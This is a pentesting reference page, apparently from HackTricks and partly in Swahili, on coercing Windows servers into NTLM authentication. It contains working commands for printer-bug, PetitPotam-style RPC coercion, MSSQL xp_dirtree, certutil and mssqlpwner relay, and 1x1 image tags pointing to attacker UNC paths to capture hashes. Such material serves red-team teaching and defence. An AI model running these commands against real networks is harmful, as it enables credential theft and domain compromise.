Force NTLM Privileged Authentication

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

SharpSystemTriggers

SharpSystemTriggers ni mkusanyiko wa vichocheo vya uthibitishaji wa mbali vimeandikwa kwa C# kwa kutumia MIDL compiler ili kuepuka utegemezi wa wahusika wa tatu.

Spooler Service Abuse

Ikiwa huduma ya Print Spooler imewezeshwa, unaweza kutumia baadhi ya nywila za AD zinazojulikana tayari kuomba kwa print server ya Domain Controller sasisho kuhusu kazi mpya za uchapishaji na kumwambia tu itume notification kwa mfumo fulani.
Kumbuka, wakati printer inapotuma notification kwa mfumo wowote, inahitaji authenticate dhidi ya mfumo huo. Kwa hivyo, mshambuliaji anaweza kufanya huduma ya Print Spooler ifanye authenticate dhidi ya mfumo wowote, na huduma itatumia computer account katika uthibitisho huo.

Finding Windows Servers on the domain

Kwa kutumia PowerShell, pata orodha ya mashine za Windows. Servers kawaida zina kipaumbele, kwa hivyo tuchukulie hapo:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

Kutambua huduma za Spooler zinazosikiliza

Tumia toleo lililobadilishwa kidogo la @mysmartlogin (Vincent Le Toux) la SpoolerScanner, angalia kama Spooler Service inasikiliza:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

Unaweza pia kutumia rpcdump.py kwenye Linux na kutafuta MS-RPRN Protocol

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Muulize huduma ithibitishwe dhidi ya mwenyeji yeyote

Unaweza ku-compile SpoolSample from here.

SpoolSample.exe <TARGET> <RESPONDERIP>

au tumia 3xocyte’s dementor.py au printerbug.py ikiwa uko kwenye Linux

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

Combining with Unconstrained Delegation

If an attacker has already compromised a computer with Unconstrained Delegation, the attacker could make the printer authenticate against this computer. Due to the unconstrained delegation, the TGT of the computer account of the printer will be saved in the memory of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to retrieve this ticket and abuse it (Pass the Ticket).

RPC Force authentication

Coercer

RPC UNC-path coercion matrix (interfaces/opnums that trigger outbound auth)

  • MS-RPRN (Print System Remote Protocol)
  • Pipe: \PIPE\spoolss
  • IF UUID: 12345678-1234-abcd-ef00-0123456789ab
  • Opnums: 62 RpcRemoteFindFirstPrinterChangeNotification; 65 RpcRemoteFindFirstPrinterChangeNotificationEx
  • Tools: PrinterBug / PrintNightmare-family
  • MS-PAR (Print System Asynchronous Remote)
  • Pipe: \PIPE\spoolss
  • IF UUID: 76f03f96-cdfd-44fc-a22c-64950a001209
  • Opnum: 0 RpcAsyncOpenPrinter
  • MS-EFSR (Encrypting File System Remote Protocol)
  • Pipes: \PIPE\efsrpc (also via \PIPE\lsarpc, \PIPE\samr, \PIPE\lsass, \PIPE\netlogon)
  • IF UUIDs: c681d488-d850-11d0-8c52-00c04fd90f7e ; df1941c5-fe89-4e79-bf10-463657acf44d
  • Opnums commonly abused: 0, 4, 5, 6, 7, 12, 13, 15, 16
  • Tool: PetitPotam
  • MS-DFSNM (DFS Namespace Management)
  • Pipe: \PIPE\netdfs
  • IF UUID: 4fc742e0-4a10-11cf-8273-00aa004ae673
  • Opnums: 12 NetrDfsAddStdRoot; 13 NetrDfsRemoveStdRoot
  • Tool: DFSCoerce
  • MS-FSRVP (File Server Remote VSS)
  • Pipe: \PIPE\FssagentRpc
  • IF UUID: a8e0653c-2744-4389-a61d-7373df8b2292
  • Opnums: 8 IsPathSupported; 9 IsPathShadowCopied
  • Tool: ShadowCoerce
  • MS-EVEN (EventLog Remoting)
  • Pipe: \PIPE\even
  • IF UUID: 82273fdc-e32a-18c3-3f78-827929dc23ea
  • Opnum: 9 ElfrOpenBELW
  • Tool: CheeseOunce

Note: These methods accept parameters that can carry a UNC path (e.g., \\attacker\share). When processed, Windows will authenticate (machine/user context) to that UNC, enabling NetNTLM capture or relay.

MS-EVEN: ElfrOpenBELW (opnum 9) coercion

  • Interface: MS-EVEN over \PIPE\even (IF UUID 82273fdc-e32a-18c3-3f78-827929dc23ea)
  • Call signature: ElfrOpenBELW(UNCServerName, BackupFileName=β€œ\\attacker\share\backup.evt”, MajorVersion=1, MinorVersion=1, LogHandle)
  • Effect: lengo linajaribu kufungua njia ya backup log iliyotolewa na kuthibitisha kwa UNC inayodhibitiwa na mshambuliaji.
  • Practical use: kufanya assets za Tier 0 (DC/RODC/Citrix/etc.) zitoe NetNTLM, kisha relay kwa AD CS endpoints (ESC8/ESC11 scenarios) au huduma nyingine zilizo na ruhusa za juu.

PrivExchange

The PrivExchange attack is a result of a flaw found in the Exchange Server PushSubscription feature. This feature allows the Exchange server to be forced by any domain user with a mailbox to authenticate to any client-provided host over HTTP.

By default, the Exchange service runs as SYSTEM and is given excessive privileges (specifically, it has WriteDacl privileges on the domain pre-2019 Cumulative Update). This flaw can be exploited to enable the relaying of information to LDAP and subsequently extract the domain NTDS database. In cases where relaying to LDAP is not possible, this flaw can still be used to relay and authenticate to other hosts within the domain. The successful exploitation of this attack grants immediate access to the Domain Admin with any authenticated domain user account.

Inside Windows

If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt

MSSQL

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Au tumia mbinu nyingine hii: https://github.com/p0dalirius/MSSQL-Analysis-Coerce

Certutil

Inawezekana kutumia certutil.exe lolbin (Microsoft-signed binary) kulazimisha uthibitishaji wa NTLM:

certutil.exe -syncwithWU  \\127.0.0.1\share

HTML injection

Via email

Ikiwa unajua email address ya mtumiaji anayeingia kwenye mashine unayotaka compromise, unaweza kumtumia tu email with a 1x1 image kama

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

na wakati atakapofungua, atajaribu authenticate.

MitM

Ikiwa unaweza kufanya MitM attack kwa kompyuta na ku-inject HTML kwenye ukurasa atakayouona, unaweza kujaribu ku-inject picha ifuatayo kwenye ukurasa:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

Njia nyingine za kulazimisha na phish uthibitishaji wa NTLM

Places to steal NTLM creds

Cracking NTLMv1

Ikiwa unaweza kunasa NTLMv1 challenges read here how to crack them.
Kumbuka kwamba ili crack NTLMv1 unahitaji kuweka Responder challenge kuwa β€œ1122334455667788”

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks